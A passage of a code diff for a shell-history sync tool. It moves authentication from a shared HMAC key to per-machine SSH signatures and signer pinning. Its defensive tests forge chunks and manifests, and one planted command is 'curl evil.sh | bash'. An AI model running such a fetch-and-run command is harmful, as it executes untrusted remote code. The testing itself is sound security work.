-    -merge``, so the rebase conflicts and the timer replays that conflict
-    forever.
+    It is either a machine that was re-enrolled after losing its key, or someone
+    rewriting the repo to publish as one of your machines. Nothing available to
+    a peer can tell those apart, so the peer refuses and says so, and a human
+    decides. Silently re-pinning would make the pin worthless: an attacker would
+    just publish a new `signer.pub` alongside the history they wanted believed.
     """
 
-    def test_sync_reports_rather_than_minting_a_replacement(self) -> None:
+    def test_losing_the_signing_key_mints_a_new_one_rather_than_stopping(self) -> None:
+        # Recording and publishing must not depend on a file the user could
+        # delete; the consequence lands on the peers, loudly, where it can be
+        # judged.
         alpha = self.machine("alpha")
         with alpha.active():
+            first = crypto.signing_public(store.signing_key_file())
+            store.signing_key_file().unlink()
+            store.signing_key_file().with_suffix(".pub").unlink()
+
             alpha.record("2023-11-14", 1_700_000_001, "git status")
-            sync.run()
-            before = store.mac_key_file().read_bytes()
-            store.mac_key_file().unlink()
-
             report = sync.run()
-            self.assertTrue(report.needs_grant, "a missing repo key was papered over")
-            self.assertFalse(store.mac_key_file().is_file(), "sync minted a competing repo key")
-            self.assertEqual(report.chunks_written, 0)
+            self.assertEqual(report.chunks_written, 1)
+            self.assertNotEqual(crypto.signing_public(store.signing_key_file()), first)
 
-            # And the real one still works once it is back.
-            store.write_atomic(store.mac_key_file(), before)
-            self.assertFalse(sync.run().needs_grant)
+    def test_a_peer_refuses_the_new_key_and_keeps_the_old_pin(self) -> None:
+        alpha, beta = self.enrolled_pair()
+        with alpha.active():
+            pinned_before = sync.State.load().signers[alpha.id]
+            store.signing_key_file().unlink()
+            store.signing_key_file().with_suffix(".pub").unlink()
+            # A new day: days it already signed are frozen under the old key,
+            # so publishing there would test nothing about the peer's refusal.
+            alpha.record("2023-11-20", 1_700_500_002, "after-the-key-changed")
+            self.assertEqual(sync.run(now=1_900_000_000).chunks_written, 1)
 
-    def test_compacting_without_the_repo_key_refuses(self) -> None:
+        with beta.active():
+            report = sync.run()
+            self.assertEqual(report.changed_signer, {alpha.id})
+            self.assertNotIn("after-the-key-changed", beta.commands())
+            # The old pin survives: a refusal must not quietly become an update.
+            self.assertEqual(sync.State.load().signers[alpha.id], pinned_before)
+
+    def test_a_human_can_accept_the_new_key_and_history_flows_again(self) -> None:
+        alpha, beta = self.enrolled_pair()
+        with alpha.active():
+            store.signing_key_file().unlink()
+            store.signing_key_file().with_suffix(".pub").unlink()
+            # A *new* day. Days it already signed are frozen -- see below.
+            alpha.record("2023-11-20", 1_700_500_002, "after-the-key-changed")
+            sync.run(now=1_900_000_000)
+
+        with beta.active():
+            sync.run()
+            code, _ = self.run_cli(beta, "trust", "--replace", "--yes")
+            self.assertEqual(code, 0)
+            sync.run()
+            self.assertIn("after-the-key-changed", beta.commands())
+
+    def test_days_it_already_signed_are_frozen_by_the_new_key(self) -> None:
+        """A consequence worth being plain about rather than discovering.
+
+        The old manifest was signed with the key that is gone, so this machine
+        can no longer verify its own record of what it published that day.
+        Signing a replacement would disown those chunks; refusing keeps them.
+        New days are unaffected, so the machine is not stuck.
+        """
         alpha = self.machine("alpha")
         with alpha.active():
-            for i in range(2):
-                alpha.record("2023-11-14", 1_700_000_000 + i, f"command {i}")
-                sync.run()
-            store.mac_key_file().unlink()
-            with self.assertRaises(WoswoarError):
-                sync.compact(before="2023-11-15")
+            alpha.record("2023-11-14", 1_700_000_001, "before the key changed")
+            sync.run()
+            store.signing_key_file().unlink()
+            store.signing_key_file().with_suffix(".pub").unlink()
+
+            alpha.record("2023-11-14", 1_700_000_002, "same day, new key")
+            alpha.record("2023-11-20", 1_700_500_002, "a fresh day")
+            report = sync.run(now=1_900_000_000)
+
+        self.assertEqual(report.unsignable, {"2023-11-14"})
+        self.assertEqual(report.chunks_written, 1, "the fresh day should still publish")
+
+    def enrolled_pair(self) -> tuple[Fake, Fake]:
+        alpha = self.machine("alpha")
+        with alpha.active():
+            alpha.record("2023-11-14", 1_700_000_001, "make -j8")
+            sync.run()
+        beta = self.machine("beta")
+        with alpha.active():
+            sync.grant()
+        with beta.active():
+            sync.run()
+        return alpha, beta
 
 
 class TestMergedHistoryIsStoredFaithfully(SyncTestCase):
@@ -1208,24 +1444,22 @@ class TestChunkAuthenticity(SyncTestCase):
         host_id: str,
         day: str,
         cmd: str,
-        tag: bytes = b"",
         name: str = "9999999999-ffffff",
     ) -> None:
         """A chunk sealed to a host's *published* day key, but not authentic.
 
-        ``tag`` empty writes it untagged, which is what an attacker holding no
-        enrolled identity can actually produce; passing bytes writes a wrong
-        tag. Both must be refused, so both are exercised.
+        Byte-for-byte a well-formed chunk -- the day's public key sits in the
+        clear, so sealing one needs no secret at all. What the attacker cannot
+        do is get it into a manifest the host signed.
         """
         pub = (work / "hosts" / host_id / "keys" / f"{day}.pub").read_text(encoding="utf-8").strip()
         entry = Entry(1_700_000_900, host_id, "s1", "~", 0, 5, cmd)
         payload = sync.pack((format_line(entry) + "\n").encode("utf-8"))
         # Named far in the future so it sorts above whatever the real machine
         # has published; a forgery the watermark skips proves nothing.
-        sealed = crypto.encrypt_to(payload, pub)
         target = work / "hosts" / host_id / day / f"{name}.age"
         target.parent.mkdir(parents=True, exist_ok=True)
-        target.write_bytes(store.frame_chunk(sealed, tag) if tag else sealed)
+        target.write_bytes(crypto.encrypt_to(payload, pub))
 
     def enrolled_pair(self) -> tuple[Fake, Fake]:
         """alpha publishing history, beta granted and up to date."""
@@ -1241,34 +1475,13 @@ class TestChunkAuthenticity(SyncTestCase):
             self.assertEqual(beta.commands(), {"make -j8"})
         return alpha, beta
 
-    def test_every_exported_chunk_carries_a_tag(self) -> None:
-        alpha = self.machine("alpha")
-        with alpha.active():
-            alpha.record("2023-11-14", 1_700_000_001, "git status")
-            sync.run()
-            mac = sync.mac_key(store.machine())
-            chunks = list(store.iter_chunks(alpha.id))
-            self.assertTrue(chunks)
-            for chunk in chunks:
-                sealed, tag = store.split_chunk(chunk.path.read_bytes())
-                self.assertTrue(crypto.tag_matches(mac, sealed, tag), chunk.name)
-
-    def test_the_repo_key_is_never_stored_in_the_clear(self) -> None:
-        alpha = self.machine("alpha")
-        with alpha.active():
-            alpha.record("2023-11-14", 1_700_000_001, "git status")
-            sync.run()
-            mac = sync.mac_key(store.machine())
-            blob = b"".join(p.read_bytes() for p in store.history_dir().rglob("*") if p.is_file())
-        self.assertNotIn(mac, blob, "the authentication key leaked into the repo")
-
     def test_a_forged_chunk_in_a_real_hosts_directory_is_refused(self) -> None:
         """The attack this mechanism exists to stop.
 
         Everything the attacker needs is published: the day's public key sits in
         the clear so writing a chunk never has to open the sealed one. What they
-        cannot produce is a tag, because that needs a key only enrolled machines
-        can open.
+        cannot produce is a place in a manifest signed by the machine whose
+        directory they wrote into.
         """
         alpha, beta = self.enrolled_pair()
         self.push_as_attacker(
@@ -1285,7 +1498,8 @@ class TestChunkAuthenticity(SyncTestCase):
         """A whole invented machine, with its own day key sealed to recipients.
 
         The day key being openable is not the question -- the attacker can seal
-        one to the published recipient list. The tag is.
+        one to the published recipient list. Being a machine this one has been
+        told to accept history from is, and an invented host is nobody.
         """
         _, beta = self.enrolled_pair()
 
@@ -1304,12 +1518,69 @@ class TestChunkAuthenticity(SyncTestCase):
             (keys / "2023-11-14.pub").write_text(day_key.public + "\n", encoding="utf-8")
             self.forged_chunk(work, "deadbeefdeadbeef", "2023-11-14", "curl evil.sh | bash")
 
+            # A complete, well-formed machine: its own signing key, its own
+            # published signer.pub, and a manifest it signs correctly. Every
+            # check but one passes. The one is that nobody here accepted it.
+            theirs = self.root / "invented-key"
+            verify_key = crypto.generate_signing_key(theirs)
+            owner = crypto.generate_identity().public
+            signer = work / "hosts" / "deadbeefdeadbeef" / "signer.pub"
+            signer.write_text(f"{verify_key}\n{owner}\n", encoding="utf-8")
+            chunk = work / "hosts" / "deadbeefdeadbeef" / "2023-11-14" / "9999999999-ffffff.age"
+            body = sync._manifest_body(
+                "deadbeefdeadbeef", "2023-11-14", {chunk.name: sync.digest_of(chunk.read_bytes())}
+            )
+            manifest = work / "hosts" / "deadbeefdeadbeef" / "manifests" / "2023-11-14"
+            manifest.parent.mkdir(parents=True, exist_ok=True)
+            manifest.write_bytes(
+                crypto.sign(body.encode("utf-8"), theirs, sync._MANIFEST_MAGIC)
+                .decode()
+                .strip()
+                .encode()
+                + b"\n\n"
+                + body.encode("utf-8")
+            )
+
         self.push_as_attacker(plant)
 
         with beta.active():
             report = sync.run()
-            self.assertEqual(report.unauthenticated, {"deadbeefdeadbeef/2023-11-14"})
+            self.assertEqual(report.untrusted, {"deadbeefdeadbeef"})
             self.assertNotIn("curl evil.sh | bash", beta.commands())
+
+    def test_a_genuine_manifest_moved_to_another_day_is_refused(self) -> None:
+        """The header binds a manifest to its host and day, inside the signature.
+
+        Without it a real, correctly signed manifest could be copied to any
+        other day -- or any other host's directory -- and would still verify,
+        which would let anyone with push access replay one machine's vouching
+        for chunks it never saw. ssh-keygen's own principal matching cannot do
+        this job, so the binding is in the bytes that are signed.
+        """
+        alpha, beta = self.enrolled_pair()
+
+        def plant(work: Path) -> None:
+            genuine = (work / "hosts" / alpha.id / "manifests" / "2023-11-14").read_bytes()
+            # Verbatim, signature and all, one day over.
+            moved = work / "hosts" / alpha.id / "manifests" / "2023-11-15"
+            moved.write_bytes(genuine)
+            # And the chunk it names, so only the header stands in the way.
+            body = genuine.split(b"\n\n", 1)[1].decode("utf-8")
+            name = body.splitlines()[1].split(" ")[0]
+            source = work / "hosts" / alpha.id / "2023-11-14" / name
+            target = work / "hosts" / alpha.id / "2023-11-15" / name
+            target.parent.mkdir(parents=True, exist_ok=True)
+            target.write_bytes(source.read_bytes())
+            keys = work / "hosts" / alpha.id / "keys"
+            for suffix in (".age", ".pub"):
+                source_key = keys / f"2023-11-14{suffix}"
+                (keys / f"2023-11-15{suffix}").write_bytes(source_key.read_bytes())
+
+        self.push_as_attacker(plant)
+
+        with beta.active():
+            report = sync.run()
+            self.assertIn(f"{alpha.id}/2023-11-15", report.unauthenticated)
 
     def test_tampering_with_an_authentic_chunk_is_refused(self) -> None:
         """Flipping bytes in a real chunk must not merely fail to decrypt."""
@@ -1338,30 +1609,44 @@ class TestChunkAuthenticity(SyncTestCase):
         with beta.active():
             self.assertEqual(sync.run().unauthenticated, {f"{alpha.id}/2023-11-14"})
 
-    def test_a_wrongly_tagged_chunk_is_refused_like_an_untagged_one(self) -> None:
-        """ "No tag" and "wrong tag" must reach the same answer.
+    def test_a_chunk_listed_by_the_wrong_signer_is_refused_like_an_unlisted_one(self) -> None:
+        """ "No manifest" and "manifest signed by someone else" are one answer.
 
         Anything else is the downgrade: an attacker would simply pick whichever
-        shape was treated more leniently.
+        shape was treated more leniently. They can generate a signing key freely
+        -- what they cannot do is make it the one this machine accepts for that
+        host.
         """
         alpha, beta = self.enrolled_pair()
-        self.push_as_attacker(
-            lambda work: self.forged_chunk(
-                work, alpha.id, "2023-11-14", "wrongly-tagged", tag=b"\x00" * 32
+
+        def plant(work: Path) -> None:
+            self.forged_chunk(work, alpha.id, "2023-11-14", "signed-by-a-stranger")
+            chunk = work / "hosts" / alpha.id / "2023-11-14" / "9999999999-ffffff.age"
+            theirs = self.root / "attacker-key"
+            crypto.generate_signing_key(theirs)
+            body = sync._manifest_body(
+                alpha.id, "2023-11-14", {chunk.name: sync.digest_of(chunk.read_bytes())}
             )
-        )
+            signature = crypto.sign(body.encode("utf-8"), theirs, sync._MANIFEST_MAGIC)
+            manifest = work / "hosts" / alpha.id / "manifests" / "2023-11-14"
+            manifest.parent.mkdir(parents=True, exist_ok=True)
+            manifest.write_bytes(
+                signature.decode("utf-8").strip().encode() + b"\n\n" + body.encode("utf-8")
+            )
+
+        self.push_as_attacker(plant)
 
         with beta.active():
             report = sync.run()
             self.assertEqual(report.unauthenticated, {f"{alpha.id}/2023-11-14"})
-            self.assertNotIn("wrongly-tagged", beta.commands())
+            self.assertNotIn("signed-by-a-stranger", beta.commands())
 
     def test_compact_refuses_to_launder_a_chunk_this_machine_did_not_write(self) -> None:
         """`merge` skips our own host id, so compaction is where this is caught.
 
-        Compaction re-seals and re-tags whatever it merges, then deletes the
+        Compaction re-seals and re-signs whatever it merges, then deletes the
         originals -- so a chunk planted under our *own* id would come out
-        carrying a tag every other machine believes, with the evidence gone.
+        carrying this machine's own signature, with the evidence gone.
         It has to refuse rather than launder.
         """
         alpha, _ = self.enrolled_pair()
@@ -1376,6 +1661,50 @@ class TestChunkAuthenticity(SyncTestCase):
             self.assertIn("refusing to compact", str(caught.exception))
             # And it is still there, not silently dropped.
             self.assertTrue(list(store.iter_chunks(alpha.id)))
+
+
+class TestExportWillNotDisownItsOwnHistory(SyncTestCase):
+    """A day whose signed list this machine cannot verify is left alone.
+
+    Signing a fresh manifest would drop every chunk published earlier that day
+    out of the signed list, and peers would then refuse them -- so a file
+    anybody with push access can corrupt would cost you published history.
+    """
+
+    def test_a_corrupted_own_manifest_stops_that_day_rather_than_truncating_it(self) -> None:
+        alpha = self.machine("alpha")
+        with alpha.active():
+            alpha.record("2023-11-14", 1_700_000_001, "published earlier")
+            sync.run()
+            before = sync.read_manifest(
+                alpha.id, "2023-11-14", crypto.signing_public(store.signing_key_file())
+            )
+            self.assertEqual(len(before), 1)
+
+            store.day_manifest(alpha.id, "2023-11-14").write_text("wrecked", encoding="utf-8")
+            alpha.record("2023-11-14", 1_700_000_002, "published later")
+            report = sync.run(now=1_900_000_000)
+
+            self.assertIn("2023-11-14", report.unsignable)
+            self.assertEqual(
+                report.chunks_written, 0, "a chunk was written with no list to hold it"
+            )
+
+    def test_another_day_is_unaffected(self) -> None:
+        alpha = self.machine("alpha")
+        with alpha.active():
+            alpha.record("2023-11-14", 1_700_000_001, "day one")
+            sync.run()
+            store.day_manifest(alpha.id, "2023-11-14").write_text("wrecked", encoding="utf-8")
+
+            # Both days have something to publish, so both are attempted; only
+            # the one whose signed list is unreadable is held back. A day with
+            # nothing new is never touched at all, corrupt manifest or not.
+            alpha.record("2023-11-14", 1_700_000_002, "day one, again")
+            alpha.record("2023-11-15", 1_700_100_001, "day two")
+            report = sync.run(now=1_900_000_000)
+            self.assertEqual(report.chunks_written, 1)
+            self.assertEqual(report.unsignable, {"2023-11-14"})
 
 
 if __name__ == "__main__":

--- a/woswoar/__main__.py
+++ b/woswoar/__main__.py
@@ -267,8 +267,11 @@ def cmd_doctor(args: argparse.Namespace) -> int:
 
     if sync.is_repo():
         info("remote", sync.remote_summary())
-        status = sync.repo_key_status(store.machine())
-        check("repo key", status.ok, status.detail)
+        status = sync.signing_status(store.machine())
+        check("signing", status.ok, status.detail)
+
+        trust = sync.trust_status(store.machine())
+        check("trust", trust.ok, trust.detail)
     else:
         info("sync", "no history repo - run 'woswoar init <url>' to sync machines")
 
@@ -302,7 +305,7 @@ def cmd_doctor(args: argparse.Namespace) -> int:
 def cmd_init(args: argparse.Namespace) -> int:
     from . import crypto, sync
 
-    known, identity = sync.initialise(
+    known, identity, pinned = sync.initialise(
         remote=args.remote,
         new_identity=args.new_identity,
         identity=Path(args.identity).expanduser() if args.identity else None,
@@ -317,6 +320,15 @@ def cmd_init(args: argparse.Namespace) -> int:
     # that reason, and this is the listing someone reads first.
     for key in sync.recipients():
         print(f"  {crypto.fingerprint(key)}")
+    if pinned:
+        # Trust on first use: this is the moment, and the only moment, that a
+        # machine accepts others without a human comparing anything. Printed so
+        # there is something to compare against afterwards.
+        print(f"\nAccepted the {len(pinned)} machine(s) already publishing here:")
+        for verify_key in pinned:
+            print(f"  {crypto.fingerprint(verify_key)}")
+        print("Check these against the machines themselves if the repository is shared.")
+
     if args.remote:
         print("\nNext: 'woswoar sync'.")
         print("On a machine that already has access, run 'woswoar grant' so this")
@@ -330,21 +342,13 @@ def cmd_sync(args: argparse.Namespace) -> int:
     report = sync.run(push=not args.no_push)
     if report.revoked:
         print(
-            "This machine's access to the shared history was revoked, so it can\n"
-            "no longer publish or read it. This is not something 'woswoar grant'\n"
-            "can undo -- a revocation is permanent, deliberately.\n\n"
+            "This machine's access to the shared history was revoked, so nothing\n"
+            "is published from here and every other machine refuses what it already\n"
+            "published. This is not something 'woswoar grant' can undo -- a\n"
+            "revocation is permanent, deliberately.\n\n"
             "Commands are still being recorded locally, and 'woswoar list' still\n"
             "shows everything this machine had before. To take part again, enrol\n"
             "with a fresh identity:  woswoar init <url> --new-identity",
-            file=sys.stderr,
-        )
-        return 0
-    if report.needs_grant:
-        print(
-            "This machine cannot publish or read history yet: the repo's\n"
-            f"authentication key was sealed before it enrolled.\n{_GRANT_REMEDY}\n"
-            "Commands are still being recorded locally and will be published in\n"
-            "full once this is done.",
             file=sys.stderr,
         )
         return 0
@@ -366,12 +370,58 @@ def cmd_sync(args: argparse.Namespace) -> int:
             file=sys.stderr,
         )
 
+    if report.untrusted:
+        print(
+            f"\n{len(report.untrusted)} machine(s) publish history this one has not been\n"
+            "told to accept, so none of it was merged. That is what a machine enrolled\n"
+            "since this one last looked is supposed to look like.\n"
+            "    woswoar trust",
+            file=sys.stderr,
+        )
+
+    if report.unpinned:
+        print(
+            f"\n{len(report.unpinned)} machine(s) were withdrawn by a revocation. Nothing\n"
+            "they publish is accepted here any more, including history they published\n"
+            "before it that this machine had not yet merged.",
+            file=sys.stderr,
+        )
+
+    if report.changed_signer:
+        print(
+            f"\nWARNING: {len(report.changed_signer)} machine(s) now sign with a different\n"
+            "key than the one accepted here, and nothing from them was merged. That is\n"
+            "either a machine that was re-enrolled or someone rewriting the repository,\n"
+            "and woswoar cannot tell which. If you re-enrolled it, accept the new key:\n"
+            "    woswoar trust --replace",
+            file=sys.stderr,
+        )
+
+    if report.unsignable:
+        print(
+            f"\nWARNING: {len(report.unsignable)} day(s) of this machine's own history\n"
+            "could not be published, because the signed list already in the repository\n"
+            "for them is not one this machine can verify. Publishing a replacement\n"
+            "would disown everything it published earlier on those days.\n"
+            "If this machine's signing key was replaced, that is why: days it signed\n"
+            "with the old one stay as they are, and new days publish normally.",
+            file=sys.stderr,
+        )
+
+    if report.foreign:
+        print(
+            f"\nWARNING: {len(report.foreign)} chunk(s) sit under this machine's own id\n"
+            "that it never published. They were not signed and will not be offered to\n"
+            "anyone, but someone else can write into this repository.",
+            file=sys.stderr,
+        )
+
     if report.unauthenticated:
         print(
             f"\nWARNING: {len(report.unauthenticated)} day(s) of history could not be\n"
-            "authenticated and were refused. Every chunk carries a tag computed with\n"
-            "a key only your enrolled machines can open, so this means the repo\n"
-            "contains history none of them wrote - someone else can write to it.",
+            "authenticated and were refused. Every machine signs a list of the chunks\n"
+            "it published, so this means the repo contains history none of your\n"
+            "machines put its name to - someone else can write to it.",
             file=sys.stderr,
         )
     return 0
@@ -500,9 +550,10 @@ def cmd_revoke(args: argparse.Namespace) -> int:
         "\n    stays readable by that key if it kept a copy."
         "\n  - It does not revoke git access. If the key got in through a stolen"
         "\n    token or deploy key, rotate that too, or it can simply fetch again."
-        "\n  - It does not stop that machine WRITING history yours will accept."
-        "\n    The authentication key is shared and cannot be rotated without"
-        "\n    rebuilding the repo."
+        "\n\nWhat it does do, from now on: nothing that machine publishes is accepted"
+        "\nby any of your machines. That includes history it published before now"
+        "\nwhich they have not merged yet, so run 'woswoar sync' on them first if"
+        "\nyou want to keep it."
     )
 
     if not _confirm("Revoke this machine's access?", args.yes):
@@ -537,6 +588,59 @@ def cmd_revoke(args: argparse.Namespace) -> int:
             "on one of those as well.",
             file=sys.stderr,
         )
+    return 0
+
+
+def cmd_trust(args: argparse.Namespace) -> int:
+    """Accept another machine's history on *this* machine."""
+    from . import crypto, sync
+
+    candidates = sync.trust_candidates()
+    fresh = [c for c in candidates if not c.pinned]
+    changed = [c for c in candidates if c.changed]
+
+    if args.replace:
+        candidates = changed
+        heading = "These machines now sign with a different key than the one accepted here."
+    else:
+        candidates = fresh
+        heading = "These machines publish history this one has not been told to accept."
+
+    if not candidates:
+        if changed and not args.replace:
+            print(
+                f"{len(changed)} machine(s) changed their signing key. Accepting a new key\n"
+                "for a machine you already accepted needs:  woswoar trust --replace",
+                file=sys.stderr,
+            )
+            return 1
+        print("nothing to accept; every machine publishing here is already accepted")
+        return 0
+
+    print(f"{heading}\n")
+    for candidate in candidates:
+        print(f"  {candidate.fingerprint}  {candidate.display_name()}")
+        if candidate.pinned:
+            print(f"    replacing  {candidate.pinned_fingerprint}")
+    print(
+        "\nCheck a fingerprint on the machine it belongs to:"
+        f"\n    {crypto.how_to_check_signer()}"
+        "\n\nThis is a decision for this machine only. Nothing is published, and every"
+        "\nother machine has to be told separately -- which is the point: the"
+        "\nrepository can be rewritten by anyone who can push to it, so what a"
+        "\nmachine accepts cannot be decided by anything kept in it."
+    )
+    if changed and args.replace:
+        print(
+            "\nA changed key is either a machine you re-enrolled or someone rewriting\nthe"
+            " repository. woswoar cannot tell those apart; you can."
+        )
+
+    if not _confirm(f"Accept history from {len(candidates)} machine(s) here?", args.yes):
+        return 1
+
+    sync.trust(candidates)
+    print(f"\naccepted {len(candidates)} machine(s); run 'woswoar sync' to merge their history")
     return 0
 
 
@@ -635,6 +739,17 @@ def build_parser() -> argparse.ArgumentParser:
     )
     p_revoke.add_argument("--yes", action="store_true", help="skip the confirmation prompt")
     p_revoke.set_defaults(func=cmd_revoke)
+
+    p_trust = subparsers.add_parser(
+        "trust", help="accept another machine's published history on this machine"
+    )
+    p_trust.add_argument(
+        "--replace",
+        action="store_true",
+        help="accept a new signing key for a machine already accepted",
+    )
+    p_trust.add_argument("--yes", action="store_true", help="skip the confirmation prompt")
+    p_trust.set_defaults(func=cmd_trust)
 
     p_compact = subparsers.add_parser("compact", help="merge old chunks (reduces file count)")
     p_compact.add_argument("--before", help="only days before this YYYY-MM-DD (default: today)")

--- a/woswoar/crypto.py
+++ b/woswoar/crypto.py
@@ -1,35 +1,36 @@
-"""Encryption, delegated entirely to the ``age`` binary, plus one MAC.
+"""Encryption and signatures, delegated entirely to ``age`` and ``ssh-keygen``.
 
-Python's standard library has no cipher -- only hashing and randomness -- so
-sealing the synced history needs an external tool. ``age`` was chosen because it
-is one small static binary and it accepts **SSH public keys as recipients**,
-which means each machine can use the keypair it already pushes to git with and
-no secret ever has to be copied between machines.
+Python's standard library has no cipher and no signature scheme -- only hashing
+and randomness -- so both halves of this need an external tool.
 
-``age`` answers "who may read this?" and nothing else. It has no notion of a
-sender, and the recipient list is published in the repo, so on its own anyone
-who can push could seal a chunk every machine would open and offer in Ctrl-R.
-Answering "did one of *my* machines write this?" needs a second primitive, and
-that one *is* in the standard library: :func:`tag` is ``hmac`` over the sealed
-bytes with a key that lives encrypted in the repo, readable only by machines
-that are already recipients.
+``age`` answers **"who may read this?"**. It was chosen because it is one small
+static binary and it accepts SSH public keys as recipients, so each machine can
+use the keypair it already pushes to git with and no secret is ever copied
+between machines.
 
-That is the only cryptographic primitive woswoar composes itself, and it is the
-one with nothing to get wrong: no nonce, no mode, no padding, no IV, and a
-constant-time comparison the standard library provides. Everything else is
-still someone else's audited binary.
+``ssh-keygen -Y`` answers **"which machine wrote this?"**, which age cannot: it
+has no notion of a sender, and the recipient list is published in the repo, so
+on its own anyone who can push could seal a chunk every machine would open and
+offer in Ctrl-R.
+
+That second question was once answered with an HMAC over a key shared by the
+whole fleet. It cannot be: whoever holds the key to *check* a tag holds the key
+to *forge* one, so a machine that was enrolled and then revoked could keep
+publishing history every other machine believed (issue #38). Nothing symmetric
+fixes that, which is why signing is asymmetric and per-machine. The private half
+never leaves the machine that made it, because no one else ever needed it.
 
 Nothing here knows about history, chunks, or git; it is a thin, testable seam so
-that swapping the backend later touches one file.
+that swapping either backend later touches one file.
 """
 
 from __future__ import annotations
 
-import hmac
 import os
 import shutil
 import subprocess
-from collections.abc import Iterable
+from collections.abc import Iterable, Iterator
+from contextlib import contextmanager
 from pathlib import Path
 from typing import NamedTuple
 
@@ -37,14 +38,13 @@ from .errors import WoswoarError
 
 AGE = "age"
 AGE_KEYGEN = "age-keygen"
+SSH_KEYGEN = "ssh-keygen"
 
-#: HMAC-SHA256 output, and so the fixed-width prefix every chunk carries.
-TAG_BYTES = 32
-
-#: Key length. The same 32 as :data:`TAG_BYTES` by coincidence, not by
-#: derivation -- widening the tag is a format change, and re-sizing the key
-#: is not, so reading one from the other would couple two unrelated decisions.
-_KEY_BYTES = 32
+#: What ssh-keygen calls the signer, in an allowed-signers line. A label only:
+#: `verify` builds that line from the key it was handed, so this always matches
+#: itself and can never fail. What binds a signature to a machine is whatever
+#: the *caller* put in the bytes it signed.
+_PRINCIPAL = "woswoar"
 
 _TIMEOUT = 120
 
@@ -54,6 +54,18 @@ class AgeError(WoswoarError):
 
     One class rather than two: every call site caught both and handled them
     identically, so the split was a distinction nothing branched on.
+    """
+
+
+class SigningError(WoswoarError):
+    """ssh-keygen is missing, or could not sign.
+
+    Separate from :class:`AgeError` because the remedy is a different package,
+    and `deps` reports them separately. A caller that does not care which tool
+    failed catches :class:`~woswoar.errors.WoswoarError`, their common base.
+
+    Note that a signature *failing to verify* is not this: that is an ordinary
+    answer about a chunk, not a failure of the tool, so `verify` returns False.
     """
 
 
@@ -97,14 +109,7 @@ def require() -> None:
 def _run(argv: list[str], data: bytes | None = None, pass_fds: tuple[int, ...] = ()) -> bytes:
     require()
     try:
-        result = subprocess.run(
-            argv,
-            input=data,
-            capture_output=True,
-            check=False,
-            timeout=_TIMEOUT,
-            pass_fds=pass_fds,
-        )
+        result = _spawn(argv, data, pass_fds)
     except subprocess.TimeoutExpired as exc:  # pragma: no cover - needs a hung age
         raise AgeError(f"{argv[0]} timed out after {_TIMEOUT}s") from exc
 
@@ -162,16 +167,8 @@ def decrypt_with_secret(data: bytes, secret: str) -> bytes:
     couple of hundred bytes, comfortably inside the pipe buffer, so writing and
     closing before age starts reading cannot deadlock.
     """
-    read_fd, write_fd = os.pipe()
-    try:
-        os.write(write_fd, secret.encode("utf-8"))
-        os.close(write_fd)
-        write_fd = -1
-        return _run([AGE, "-d", "-i", f"/dev/fd/{read_fd}"], data, pass_fds=(read_fd,))
-    finally:
-        if write_fd != -1:
-            os.close(write_fd)
-        os.close(read_fd)
+    with _as_fd(secret.encode("utf-8")) as identity_fd:
+        return _run([AGE, "-d", "-i", f"/dev/fd/{identity_fd}"], data, pass_fds=(identity_fd,))
 
 
 def generate_identity() -> Identity:
@@ -197,7 +194,7 @@ def recipient_for(identity: Path) -> str:
     For an SSH key this is the contents of its ``.pub`` sibling, which is what
     other machines will encrypt to; for an age identity, age derives it.
     """
-    pub = identity.with_suffix(identity.suffix + ".pub")
+    pub = public_half(identity)
     if pub.is_file():
         return pub.read_text(encoding="utf-8").strip()
     # Reading the file ourselves, then reusing public_of, which already knows
@@ -261,39 +258,190 @@ def how_to_check(fingerprint: str) -> str:
     return _CHECK_SSH if fingerprint.startswith("SHA256:") else _CHECK_AGE
 
 
+def how_to_check_signer() -> str:
+    """The command that reproduces a *signing* fingerprint on its own machine.
+
+    Beside `how_to_check` and separate from it: a signing key is woswoar's own,
+    not the identity, so sending someone to ``~/.ssh/id_ed25519.pub`` for it
+    would be advice that quietly prints a different key.
+    """
+    return "ssh-keygen -lf ~/.config/woswoar/signing_key.pub"
+
+
 # ---------------------------------------------------------------------------
-# Authenticity. Answers "did one of my machines write this?", which age cannot.
+# Authorship. Answers "which of my machines wrote this?", which age cannot, and
+# which a shared secret cannot either: whoever can check a MAC can forge one.
 # ---------------------------------------------------------------------------
 
 
-def new_mac_key() -> bytes:
-    """A fresh key for :func:`tag`, from the OS random source.
+def signing_available() -> bool:
+    return shutil.which(SSH_KEYGEN) is not None
 
-    ``os.urandom`` rather than ``secrets.token_bytes``, which is a thin wrapper
-    over it: importing ``secrets`` drags in ``random`` and ``bisect`` for ~1.4 ms
-    of interpreter start, and this module is loaded by every `sync`.
+
+def require_signing() -> None:
+    if not signing_available():
+        from . import deps
+
+        raise SigningError(
+            "Sync signs what it publishes, so other machines can tell which one "
+            "wrote it.\n" + deps.report([deps.SSH_KEYGEN])
+        )
+
+
+def generate_signing_key(path: Path) -> str:
+    """Create this machine's signing key at ``path``; return its public half.
+
+    A key of woswoar's own rather than the sync identity, for a reason that is
+    not stylistic: `choose_identity` may hand back an *age* identity, which is
+    X25519 and cannot sign at all. Reusing it would work on machines that happen
+    to sync with an SSH key and fail on the rest.
+
+    The private half never leaves this machine and is never published, which is
+    the whole point -- it is the one thing a revoked machine cannot keep a
+    useful copy of, because nobody else ever needed it to verify.
     """
-    return os.urandom(_KEY_BYTES)
+    require_signing()
+    path.parent.mkdir(parents=True, exist_ok=True)
+    # ssh-keygen refuses to overwrite, and would prompt about it on a terminal.
+    path.unlink(missing_ok=True)
+    public_half(path).unlink(missing_ok=True)
+    _run_signer([SSH_KEYGEN, "-t", "ed25519", "-N", "", "-C", "woswoar", "-q", "-f", str(path)])
+    path.chmod(0o600)
+    return signing_public(path)
 
 
-def tag(key: bytes, data: bytes) -> bytes:
-    """The authentication tag for ``data``.
+def public_half(path: Path) -> Path:
+    """The ``.pub`` sibling of a key file.
 
-    Computed over the *sealed* bytes rather than the plaintext, so a reader can
-    establish that a chunk came from one of its own machines before decrypting
-    or decompressing it -- encrypt-then-MAC, the ordering that does not need
-    the recipient to parse hostile input first.
+    One spelling, because ``with_suffix(".pub")`` and ``suffix + ".pub"`` differ
+    for any name containing a dot and agreeing by accident is how they drift.
     """
-    return hmac.new(key, data, "sha256").digest()
+    return path.with_suffix(path.suffix + ".pub")
 
 
-def tag_matches(key: bytes, data: bytes, expected: bytes) -> bool:
-    """Whether ``expected`` is the right tag for ``data``.
+def signing_public(path: Path) -> str:
+    """The verify half of a signing key, as it is published and pinned."""
+    return public_half(path).read_text(encoding="utf-8").strip()
 
-    ``compare_digest`` rather than ``==``: the standard library's constant-time
